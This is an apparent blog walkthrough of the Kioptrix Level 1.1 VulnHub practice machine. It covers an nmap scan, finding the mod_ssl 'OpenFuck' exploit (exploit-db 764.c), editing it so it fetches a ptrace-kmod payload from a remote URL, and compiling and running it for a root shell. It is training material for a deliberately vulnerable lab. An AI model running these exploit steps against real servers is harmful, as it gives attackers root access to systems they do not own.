Kioptrix level1.1 walkthrough

This is the Kioptrix vulnerable machine walkthrough.

You can download it fromĀ https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

The scan:

root@kali:~# nmap -sT -sV -p- 192.168.31.142

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-17 17:00 EST
Nmap scan report for 192.168.31.142
Host is up (0.00014s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:E2:87:5A (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.92 seconds
root@kali:~#

We will search for vulnerabilities for mod_ssl/2.8.4.

 

root@kali:~/junk# searchsploit 764.c
————————————————————————————————————————————————————————– ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
————————————————————————————————————————————————————————– ———————————-
Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuckV2.c’ Remote Exploit | unix/remote/764.c
Microsoft Windows – VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138) | windows/local/40764.cs
Symantec AntiVirus – IOCTL Kernel Privilege Escalation (2) | windows/local/28764.c
TechSmith Snagit 10 (Build 788) – ‘dwmapi.dll’ DLL Hijacking | windows/local/14764.c
————————————————————————————————————————————————————————– ———————————-
root@kali:~/junk#

We will try the first result.

Downloading the exploit in C format:

http://wget https://www.exploit-db.com/download/764.c

Install prerequisites

apt-get install libssl-devĀ libssl1.0-dev

Edit the C file.

nano 764.c

Include the following 2 lines on the SSL include area

#include <openssl/rc4.h>
#include <openssl/md5.h>

Search for wget (ctrl+W in nano) and replace the URL with this new one :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Compile the exploit:

sudo gcc -o OpenFucka ./764.c -lcrypto

Run the exploit:

root@kali:~/junk# ./OpenFucka 0x6b 192.168.31.142 443 -c 50

If everything works ok you should get your root shell:

Posted in hacking, vulnhub. Tagged with , , .

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.